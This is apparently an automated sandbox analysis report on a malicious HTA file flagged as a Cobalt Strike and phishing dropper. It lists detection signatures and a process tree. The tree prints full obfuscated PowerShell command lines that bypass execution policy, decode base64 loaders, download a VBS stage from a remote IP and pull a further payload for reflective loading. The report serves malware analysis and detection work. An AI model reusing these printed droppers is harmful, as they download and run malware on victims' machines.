Windows
Analysis Report
seemebestthings.hta
Overview
General Information
Detection
Cobalt Strike, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7328 cmdline:
mshta.exe "C:\Users\user\Desktop\seemebestthings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 7400 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwErS HeLL -EX b yPasS -noP -w 1 -C dEvICE cReDEnTial DepLOYMeNt ; invOkE- ExPREsSiOn ($(invOKe- expreSSIon ('[sYStEM. TExt.EnCOd INg]'+[ChA R]0X3a+[cH ar]58+'Utf 8.GETStRIN G([sYsTem. coNVeRT]'+ [cHAr]58+[ chaR]58+'f romBASE64S tring('+[C haR]0X22+' JHFidmRDTl AzWCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgPSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg YURELVRZUG UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIC1NZW1i ZXJERUZJTk lUaW9OICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgidVJM TW9uIiwgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE NoYXJTZXQg PSBDaGFyU2 V0LlVuaWNv ZGUpXXB1Ym xpYyBzdGF0 aWMgZXh0ZX JuIEludFB0 ciBVUkxEb3 dubG9hZFRv RmlsZShJbn RQdHIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIEZO cEpJS3Asc3 RyaW5nICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICB5 R09zTE1jLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ckFuYlBOLH VpbnQgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIFhu VmJyQyxJbn RQdHIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGto enNHaU9LKT snICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbmFt RSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgImpMYm ZUSnJTSXVq IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLW5BbW VzUGFjZSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg QXcgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1QYX NzVGhydTsg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICRxYnZkQ0 5QM1g6OlVS TERvd25sb2 FkVG9GaWxl KDAsImh0dH A6Ly8xNzIu MjQ1LjEyMy 4yOS8xMzQz L3NlZW1lYm VzdHRoaW5n c3dpdGhlbn RpcmV0aGlu Z3N3aXRoZ3 JlYXRuYXR1 cmV0aGluZ3 MudElGIiwi JGVuVjpBUF BEQVRBXHNl ZW1lYmVzdH RoaW5nc3dp dGhlbnRpcm V0aGluZ3N3 aXRoZ3JlYX RuYXR1cmV0 aGluZy52Yl MiLDAsMCk7 c1RhUlQtU0 xlZVAoMyk7 aUkgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICIkRW 52OkFQUERB VEFcc2VlbW ViZXN0dGhp bmdzd2l0aG VudGlyZXRo aW5nc3dpdG hncmVhdG5h dHVyZXRoaW 5nLnZiUyI= '+[CHaR]34 +'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7408 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7452 cmdline:
POwErSHeLL -EX byPa sS -n oP -w 1 -C dEvICEcRe DEnTialDep LOYMeNt ; invOkE-ExP REsSiOn($( invOKe-exp reSSIon('[ sYStEM.TEx t.EnCOdINg ]'+[ChAR]0 X3a+[cHar] 58+'Utf8.G ETStRING([ sYsTem.coN VeRT]'+[cH Ar]58+[cha R]58+'from BASE64Stri ng('+[ChaR ]0X22+'JHF idmRDTlAzW CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYUR ELVRZUGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI C1NZW1iZXJ ERUZJTklUa W9OICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgidVJMTW9 uIiwgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIENoY XJTZXQgPSB DaGFyU2V0L lVuaWNvZGU pXXB1YmxpY yBzdGF0aWM gZXh0ZXJuI EludFB0ciB VUkxEb3dub G9hZFRvRml sZShJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEZOcEp JS3Asc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICB5R09 zTE1jLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgckF uYlBOLHVpb nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIFhuVmJ yQyxJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGtoenN HaU9LKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtbmFtRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gImpMYmZUS nJTSXVqIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW5BbWVzU GFjZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQXc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIC1QYXNzV GhydTsgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICR xYnZkQ05QM 1g6OlVSTER vd25sb2FkV G9GaWxlKDA sImh0dHA6L y8xNzIuMjQ 1LjEyMy4yO S8xMzQzL3N lZW1lYmVzd HRoaW5nc3d pdGhlbnRpc mV0aGluZ3N 3aXRoZ3JlY XRuYXR1cmV 0aGluZ3Mud ElGIiwiJGV uVjpBUFBEQ VRBXHNlZW1 lYmVzdHRoa W5nc3dpdGh lbnRpcmV0a GluZ3N3aXR oZ3JlYXRuY XR1cmV0aGl uZy52YlMiL DAsMCk7c1R hUlQtU0xlZ VAoMyk7aUk gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICIkRW52O kFQUERBVEF cc2VlbWViZ XN0dGhpbmd zd2l0aGVud GlyZXRoaW5 nc3dpdGhnc mVhdG5hdHV yZXRoaW5nL nZiUyI='+[ CHaR]34+') )')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 7580 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 7600 cmdline:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C55.tmp" "c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 7672 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnNEFtb2 NoYXZpbGhh ID0gc0lXaH R0cHM6Ly8z MTAnKyc1Lm ZpbGVtYWls LmNvbS9hcG kvZmlsZS9n ZXQ/ZmlsZW tleT1zaFRQ SCcrJ2JDUF g4bycrJy1s T3RDcUhMRz ZfMHgnKydD eS14bDR0bn hsQVZiUTk1 LWR2JysnaV RLNWNBUicr J2FOZFFqYm IzbWV4ZndR ekttVFhnJn NraXByZWc9 dHJ1ZSZwa1 92aScrJ2Q9 ZTAxJysnMD k2MzhjOWJm Yjk1NzE3Mz I1MzEnKycz MDliNWZmN2 Mgc0lXOzRB bXRyaWNoaX NtbyA9IE5l dy1PYmplY3 QgU3lzdGVt Lk5ldC5XZW JDbGllbnQ7 NEFtbGluZm 90b21pYSA9 ICcrJzRBbX RyaWNoaXNt by5Eb3dubG 9hZERhdGEo NEFtbycrJ2 NoYXZpbGhh KTs0QW1wcm VzdW0nKydw dHUnKydvc2 8gPSBbU3lz dGVtLlRleH QuRW5jb2Rp bmddOjpVVE Y4LkdldFN0 cmluZyg0Jy snQW1saW5m b3RvbScrJ2 lhKTs0QW1u aXRpZHVsYX IgPSBzSVc8 PEJBJysnU0 U2NF9TVEFS VD4+c0lXOz RBbW9idm9s dmlkbyA9IH NJVycrJzw8 QkFTRTYnKy c0X0VORD4+ c0lXOzRBbW xvZ29ncmlm byA9IDRBbX ByJysnZXN1 bXB0dW9zby 5JbmRleE9m KDRBbW5pdG knKydkdWxh cicrJyk7NE FtdG9saGlk byA9IDRBbX ByZXN1bXB0 dW9zby5Jbm RleE9mKDRB bW8nKydidm 9sdmlkbyk7 NEFtbG9nb2 dyaWZvIC1n ZSAwIC1hbm QgNEFtdG9s aGlkbyAtZ3 QgNEFtbG9n b2dyaWZvOz RBbWxvZ29n cmlmbyArPS A0QW1uaXRp ZHVsYXIuTG VuZycrJ3Ro OzRBbXZpbm RpdGEgPSA0 QW10b2xoaW RvIC0gNEFt bG9nb2dyaW ZvOzRBbScr J2ZpZ2EgPS A0QW1wcmVz dW1wdHVvc2 8uU3Vic3Ry aW5nKDRBbW xvZ29ncmlm bywgNEFtdm luZGl0YSk7 NEFtYW50aW dhbWVudGUg PSAtam9pbi AoNEFtZmln YS5UbycrJ0 NoYXJBcnJh JysneSgpIF MnKydFMiBG b3JFYWNoLU 9iamUnKydj dCB7IDRBbV 8gfSlbLTEu Li0oNEFtZm lnYS5MZW5n dGgpXTs0QW 1tYScrJ3Jt b3InKydpem FyJysnID0g WycrJ1N5c3 RlbS5Db252 ZXJ0XTo6Rn JvbUJhc2U2 NFN0cmluZy g0QW1hbnRp Z2FtZW50ZS k7NEFtZGVz ZW1tYWRlaX JhciA9IFtT eXN0ZW0uUm VmbGVjdGlv bi5Bc3NlbW InKydseV06 OkxvYWQoNE FtbWFybW9y aXphcik7NE FtcG9lJysn dGlmaWNhci A9IFtkbmxp Yi5JTy5Ib2 1lXS5HZXRN ZXRob2Qocy crJ0lXVkFJ cycrJ0lXKT s0QW0nKydw b2V0aWZpY2 FyLkludm9r ZSg0QW1udW xsLCBAKHNJ V3R4dC5WR0 ZSRS8zNDMx LzkyLjMyMS 41NDIuMjcx Ly86cHR0aH NJVywgc0lX NEFtZGUnKy dzdW5pZmlj YXJzSVcsIH NJVzRBbWRl c3VuaWZpY2 Fyc0lXLCBz SVc0QW1kZX N1bmlmaWNh cnNJVywgc0 lXYXNwbmV0 X2NvbXBpbG 
Vyc0lXLCBz SVc0JysnQW 1kZXN1bmlm aWNhcnNJVy wgc0lXNEFt ZGVzdW5pZm ljYXJzSVcs c0lXNEFtZG VzdW5pZmlj YScrJ3JzSV csc0lXNEFt ZGVzdW5pZm ljYXJzSVcs c0lXNEFtZG VzdW5pZmlj YXJzSVcsc0 lXNEFtZGVz dW5pZmljYX JzSVcsc0lX NEFtZGVzdW 5pZmljYXJz SVcsc0lXMX NJVyxzSScr J1c0QW1kZX N1bmlmaWNh cnNJVykpOy cpIC1jUkVQ bEFjZSAoW2 NoYVJdNTIr W2NoYVJdNj UrW2NoYVJd MTA5KSxbY2 hhUl0zNiAt Y1JFUGxBY2 UgJ3NJVycs W2NoYVJdMz kgIC1jUkVQ bEFjZShbY2 hhUl04Mytb Y2hhUl02OS tbY2hhUl01 MCksW2NoYV JdMTI0KSB8 ICYoICRFTn Y6Q29tc3BF Y1s0LDI0LD I1XS1Kb2lO Jycp';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass -